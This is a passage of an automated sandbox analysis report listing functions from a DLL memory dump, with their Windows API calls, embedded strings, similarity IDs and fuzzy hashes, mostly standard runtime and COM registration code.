Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 97ee7f1a3d38b556bd64cf968a69acb2bed053475ce1087d0187961a448d3772
Instruction ID: 5ee3ef3385cbe46dd2ab667e61e426347d731e3ed8688114ee1daf52e28a76c6
Opcode Fuzzy Hash: 97ee7f1a3d38b556bd64cf968a69acb2bed053475ce1087d0187961a448d3772
Instruction Fuzzy Hash: 75116071649E21FBEB219A689C88F5A366CFF667F9F410025F905E7140DB60EC304AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F190AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6F1D1478,1E3BCBB0), ref: 6F190B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6F190BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6F190BD5
LoadRegTypeLib.OLEAUT32(6F1C9538,00000000,00000000,?,00000000), ref: 6F190BFD
EnterCriticalSection.KERNEL32(6F1D1494), ref: 6F190DC0
LeaveCriticalSection.KERNEL32(6F1D1494), ref: 6F190DD6

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 295365bf6f5312ce389ca5c2e03b45d3f25f62a28dd3af7c370d0595aec800a2
Instruction ID: 9497d85e44b021e2e39d2a1bc029a836d57662224c16b92eac56b6b5198a901b
Opcode Fuzzy Hash: 295365bf6f5312ce389ca5c2e03b45d3f25f62a28dd3af7c370d0595aec800a2
Instruction Fuzzy Hash: 29B17D75901618EFDB10CB64C888B9ABBF4EF5A394F1051D9E809EB240D735EE64CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1B4A50
_free.LIBCMT ref: 6F1B4A5E
_free.LIBCMT ref: 6F1B4B8C
_free.LIBCMT ref: 6F1B4B97

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 25f96df678e46ec6c1b0e8195cd66af4a83e1b42e3455aa71b95877f49172b59
Instruction ID: 10735b96de166b364a69be755e9f167a299d1499905f4d766bf84504f5106368
Opcode Fuzzy Hash: 25f96df678e46ec6c1b0e8195cd66af4a83e1b42e3455aa71b95877f49172b59
Instruction Fuzzy Hash: C461C476D04309EFDB10CF68C941B9ABBF5FF457A0F1181AEE954EB280D731A9618B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F193DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6F180000,?,00000104), ref: 6F193E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6F193EF7

Strings

REGISTRY, xrefs: 6F194030
APPID, xrefs: 6F193E3D
Module, xrefs: 6F193FA2
Module_Raw, xrefs: 6F193FD3

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: bc2b8d0563ca841d1ee98681e7b36e3be7eef75f29b3b98b45dbf786667f8183
Instruction ID: aa049f4ce6f97ebe62ce751f27b0d468213163103abc82556c07d71ae13b51b3
Opcode Fuzzy Hash: bc2b8d0563ca841d1ee98681e7b36e3be7eef75f29b3b98b45dbf786667f8183
Instruction Fuzzy Hash: BC711735A006188BDB24CF54CD51BEA7378BF55798F0002ADD81EA7680EB756E65CFC2

Uniqueness

Uniqueness Score: -1.00%

Function 6F1903B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6F180000,?,00000104), ref: 6F19048D
GetModuleHandleW.KERNEL32(00000000), ref: 6F190507

Strings

REGISTRY, xrefs: 6F19063D
APPID, xrefs: 6F19044D
Module, xrefs: 6F1905B2
Module_Raw, xrefs: 6F1905DF

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 58a3aafd7b704515b54ff9a02b6898aa3406cac8f334e4b1c384878737b58681
Instruction ID: c9c34b33127c0ff1dea477fc2bfba78d3a57b6208d09d3896d0cf308e0d0c043
Opcode Fuzzy Hash: 58a3aafd7b704515b54ff9a02b6898aa3406cac8f334e4b1c384878737b58681
Instruction Fuzzy Hash: 3561D5359006188BDB24CF60CD90BEE7374BF65794F0012ADD81AA7580DB756EA4CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F18EBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6F18EC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6F18EC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6F18EC96
LoadResource.KERNEL32(00000000,00000000), ref: 6F18ECAE

Part of subcall function 6F18E270: GetLastError.KERNEL32(6F18ED79), ref: 6F18E270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6F18ED9F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 8c0dcd180978777d843e7e984143b2b9b0ef621b6fc3cb7d8c0fc2b8718eb2e8
Instruction ID: 862078ad4098668dc4f39081f70ef80419aaea7e0e1503b3818acbbca2147c2b
Opcode Fuzzy Hash: 8c0dcd180978777d843e7e984143b2b9b0ef621b6fc3cb7d8c0fc2b8718eb2e8
Instruction Fuzzy Hash: 6A51F4B1900219DBDB20CFA4CE80B9DB7F5EF497A4F500259F529A7280D730AB648F59

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6F1B024E,?,?,?,?,?), ref: 6F1AFAFE
__fassign.LIBCMT ref: 6F1AFB80
__fassign.LIBCMT ref: 6F1AFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6F1AFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6F1B024E), ref: 6F1AFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6F1B024E), ref: 6F1AFC24

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 506a49a861609033c8e032f701d2eaadc567ba6eefb8df806210f6700b635715
Instruction ID: 9858d1a1a503aebbb65d3e55fbbedaa5ae2c82bc6d983c02cda27a2d1d54668b
Opcode Fuzzy Hash: 506a49a861609033c8e032f701d2eaadc567ba6eefb8df806210f6700b635715
Instruction Fuzzy Hash: 8C51B174E042499FDB10CFA8D890AEEBBF8FF09350F14411BE965E7281D732A961CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F199350, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6F19937B
___except_validate_context_record.LIBVCRUNTIME ref: 6F199383
_ValidateLocalCookies.LIBCMT ref: 6F199411
__IsNonwritableInCurrentImage.LIBCMT ref: 6F19943C
_ValidateLocalCookies.LIBCMT ref: 6F199491

Strings

csm, xrefs: 6F199426

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bbc16b227044256cdcca478b6d2d83c7138abe16693b05c848aa8fad05f09d3d
Instruction ID: 870b017c02307f06a3a1e0cf6c7d44623274f511f8ca1015f8ed21964fe74c1a
Opcode Fuzzy Hash: bbc16b227044256cdcca478b6d2d83c7138abe16693b05c848aa8fad05f09d3d
Instruction Fuzzy Hash: B441A334A00209EFCF10CF69C894A9EBBB5BF553A8F408159E8245B295D735FA25CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F198680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,1E3BCBB0,?,00000000,?,00000000,8007000E), ref: 6F1986F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6F19872A

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 375cf946a8dae1d6cd78ffd45302cfb4dc9a34ff7b7c0b84ba625a2833d2bb4b
Instruction ID: 77ee6802cac44e6757c8c60f0eeeda743d384438f96843bf9c36437afea1d2a4
Opcode Fuzzy Hash: 375cf946a8dae1d6cd78ffd45302cfb4dc9a34ff7b7c0b84ba625a2833d2bb4b
Instruction Fuzzy Hash: 9C314976A44308ABD710CF648C45FAB77B8FB40BB4F10412AF915EA2C0D732B520C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 6F193380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6F193410
GetWindowLongW.USER32 ref: 6F193424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6F19343A
GetWindowLongW.USER32 ref: 6F193453
SetWindowLongW.USER32(?,000000FC,?), ref: 6F193462

Strings

$, xrefs: 6F1933C4

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 370f469243fdc644578e22a84cb31ed7ea75a184ad0bffbac18fa10cd7c2a69c
Instruction ID: 8bccaa79c7ef7b9b190069e351fa9a28e20a81cbad407892e67d85e38be5428c
Opcode Fuzzy Hash: 370f469243fdc644578e22a84cb31ed7ea75a184ad0bffbac18fa10cd7c2a69c
Instruction Fuzzy Hash: 2C412A71900608EFCB11CF99C885A9FBBF5FF58750F10861DE86AA76A0D731A924CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F18E440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,1E3BCBB0), ref: 6F18E494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6F18E4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,1E3BCBB0), ref: 6F18E4E0
RegCloseKey.ADVAPI32(00000000), ref: 6F18E4F3

Strings

Advapi32.dll, xrefs: 6F18E48F
RegOpenKeyTransactedW, xrefs: 6F18E4A5

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: aee2df91724049d7c3ab2fdb9bb30f037dc06b7a238c82ae5c0c6181510c3f9e
Instruction ID: 1bbac19b5dbc29aa0a28f753456c2e1bfc679d71025f035f1ba20e7451679fdb
Opcode Fuzzy Hash: aee2df91724049d7c3ab2fdb9bb30f037dc06b7a238c82ae5c0c6181510c3f9e
Instruction Fuzzy Hash: 94319571A04206DFDB10CF95C984BAABBB9FB557A0F104529F829D7280D735A920CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F188BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F188C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F188C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F188C44
SysFreeString.OLEAUT32(00000000), ref: 6F188C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6F188C76
SysFreeString.OLEAUT32(00000000), ref: 6F188C83
SysFreeString.OLEAUT32 ref: 6F188CB2

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 56966bfb87ff89a7ed589ddab4da2ded764f1f2e19e677caef8292e42f7c0e41
Instruction ID: f7a3581f1f36f999ad727124c906f63f5369522b22a37f89ed71f89ae6edbced
Opcode Fuzzy Hash: 56966bfb87ff89a7ed589ddab4da2ded764f1f2e19e677caef8292e42f7c0e41
Instruction Fuzzy Hash: 58112C31649614FBDB109F64CE88FDE7B74EF52BB4F100269F635AA2C4CB716924CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ADFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6F1AE00D
api-ms-, xrefs: 6F1ADFF9

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9c7e0cb8135ce523e6f07f3ee42dce0a94ec60268d88484831273f4d02a2562e
Instruction ID: f0063a325b653e63ab84a2440d6c729b729c17c71adb8e5bbff07e1274b7a723
Opcode Fuzzy Hash: 9c7e0cb8135ce523e6f07f3ee42dce0a94ec60268d88484831273f4d02a2562e
Instruction Fuzzy Hash: 9D21F935B45625EBC7218A398E80B5B37699F127F0F110211ED24EB280D673FE3087E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1821F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18221D

Part of subcall function 6F1994A7: RaiseException.KERNEL32(?,?,6F196476,000000FF,00000000,00000000,24448D6F,?,?,?,?,6F196476,000000FF,6F1CCD2C,?,000000FF), ref: 6F199507

__CxxThrowException@8.LIBVCRUNTIME ref: 6F182262
___std_exception_copy.LIBVCRUNTIME ref: 6F18228F

Strings

ios_base::eofbit set, xrefs: 6F182236
ios_base::badbit set, xrefs: 6F182227, 6F182252, 6F182273
ios_base::failbit set, xrefs: 6F182135, 6F182231

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 6c0a5fd453011fa135f1cb86a928b0ac24910b82bb6c0c0fb95bc6b37d6c76d6
Instruction ID: 6147aacc486a0ddc08a03e9f3bf82a7e2803793d6f7ff2181e325ae777b6184e
Opcode Fuzzy Hash: 6c0a5fd453011fa135f1cb86a928b0ac24910b82bb6c0c0fb95bc6b37d6c76d6
Instruction Fuzzy Hash: 401105B29007046BC701CF68C941BC6B3E8AF652A0F04861AF968E7180E775B534CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6F1B4BFD: _free.LIBCMT ref: 6F1B4C26

_free.LIBCMT ref: 6F1B4F04

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B4F0F
_free.LIBCMT ref: 6F1B4F1A
_free.LIBCMT ref: 6F1B4F6E
_free.LIBCMT ref: 6F1B4F79
_free.LIBCMT ref: 6F1B4F84
_free.LIBCMT ref: 6F1B4F8F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 1eb41b428b303a5409dda7d672ee23d65a01baa14027d099b8777b59af1a32ad
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: D7112171540B4CEAD620BFB0CD45FCB779C6F04789F808819E39EAA0D0DB77B5658650

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AF447, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6F19E12A,6F19E12A,?,?,?,6F1AF698,00000001,00000001,F9E85006), ref: 6F1AF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6F1AF698,00000001,00000001,F9E85006,?,?,?), ref: 6F1AF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6F1AF621
__freea.LIBCMT ref: 6F1AF62E

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

__freea.LIBCMT ref: 6F1AF637
__freea.LIBCMT ref: 6F1AF65C

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 3b3c9bdacd41444776b6d20450f9bd0dd28e3502d6c1d1b2ad70f95c3d61fe6a
Instruction ID: 49a5f6a130ddf8604e42f5de4d63540bab8ea41d4154bcab1fe8d7ed3a7c0d39
Opcode Fuzzy Hash: 3b3c9bdacd41444776b6d20450f9bd0dd28e3502d6c1d1b2ad70f95c3d61fe6a
Instruction Fuzzy Hash: 1151E576600206AFEB158E64CC80EAF77ADEF557E4F114629FC28D6190DB36EC61CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F191810, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6F1918BE

Part of subcall function 6F1934B0: EnterCriticalSection.KERNEL32(6F1CFAA4,?,?), ref: 6F1934FA
Part of subcall function 6F1934B0: GetClassInfoExW.USER32 ref: 6F19352D
Part of subcall function 6F1934B0: GetClassInfoExW.USER32 ref: 6F193544
Part of subcall function 6F1934B0: LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F193553

Part of subcall function 6F198508: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6F193342), ref: 6F19850D
Part of subcall function 6F198508: HeapAlloc.KERNEL32(00000000), ref: 6F198514

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,6F1B9D70,000000FF), ref: 6F191909
GetCurrentThreadId.KERNEL32 ref: 6F1919AE
EnterCriticalSection.KERNEL32(6F1CFAA4), ref: 6F1919BC
LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F1919D5
CreateWindowExW.USER32 ref: 6F191A0B

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: b2c9f7934c41b7950828884bcd7494f42ed6e48d6be792dc029e3e8650660e26
Instruction ID: 4572ba74d83af504c7e2accc2308f513eaf0b70b90c31e3957317446a2d19d20
Opcode Fuzzy Hash: b2c9f7934c41b7950828884bcd7494f42ed6e48d6be792dc029e3e8650660e26
Instruction Fuzzy Hash: CB617271900605EFDB04CFA8C894BAEBBB9FF48754F10815AF815BB380D734A960CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F18EEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,1E3BCBB0,00000000,00000000), ref: 6F18EEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6F18EF1B
CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF34
CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6F18EFAE

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1f826b9ad6ae3c98466b075409f8c17f760d0bd3450f9d27f1eefe68afdf92c2
Instruction ID: df9f3fe8c24353b2b32802d37d080965ac2f3175d2cb0479124a0e5079851b4b
Opcode Fuzzy Hash: 1f826b9ad6ae3c98466b075409f8c17f760d0bd3450f9d27f1eefe68afdf92c2
Instruction Fuzzy Hash: A141F935600116CFCB14DF68C68056AB7F3EF99391F6141AAE864CB354E731AA62CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F184460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F1844A9
std::_Lockit::_Lockit.LIBCPMT ref: 6F1844CB
std::_Lockit::~_Lockit.LIBCPMT ref: 6F1844EB
__Getctype.LIBCPMT ref: 6F184587
std::_Facet_Register.LIBCPMT ref: 6F1845A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6F1845C6

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 67f457a6c62724829859e0443f184d4a9f9abc186905d5c9e7600ca8ab1d581a
Instruction ID: 569ef5ee66bd155ba8107eedb6f563e326a386c7ee816751ee922664cbd33131
Opcode Fuzzy Hash: 67f457a6c62724829859e0443f184d4a9f9abc186905d5c9e7600ca8ab1d581a
Instruction Fuzzy Hash: 8251BF729046148FCB14CF58C680A9EB7F8FF557A4F11416AD829AB281EB30FA25CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F18E530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

